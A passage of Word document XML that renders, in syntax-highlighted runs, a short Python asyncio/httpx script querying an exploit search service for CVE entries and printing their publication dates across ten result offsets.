          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F22D198" w14:textId="36647333" w:rsidR="00AE0232" w:rsidRDefault="00AE0232" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD60FCF" w14:textId="77777777" w:rsidR="004E6350" w:rsidRDefault="004E6350" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">async def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>querySploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">async with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>httpx.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>proxies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=proxies, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>client:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        response = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>client.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>={</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"type"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"exploits"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"sort"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"date"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"query"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"cve"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"title"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"offset"</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_offset</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=headers)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        res_json = response.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>json</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res_list = []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        exps = res_json[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"exploits"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">single_exp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exps:</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>single_exp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"published"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>None</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single_exp_date = single_exp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"published"</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res_list.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(single_exp_date)</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56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, res_list)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">task_list = [ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>querySploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=url, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">*x) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">x </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2500C89C" w14:textId="77777777" w:rsidR="00863B1E" w:rsidRDefault="00863B1E" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F840046" w14:textId="514AFDDE" w:rsidR="00863B1E" w:rsidRPr="00863B1E" w:rsidRDefault="00863B1E" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>loop = asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_event_loop</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loop.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>run_until_complete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0EE7B7" w14:textId="77777777" w:rsidR="004E6350" w:rsidRPr="004E6350" w:rsidRDefault="004E6350" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D009595" w14:textId="4A609C75" w:rsidR="004E6350" w:rsidRDefault="00C328EE" w:rsidP="009222EB">
      <w:pPr>
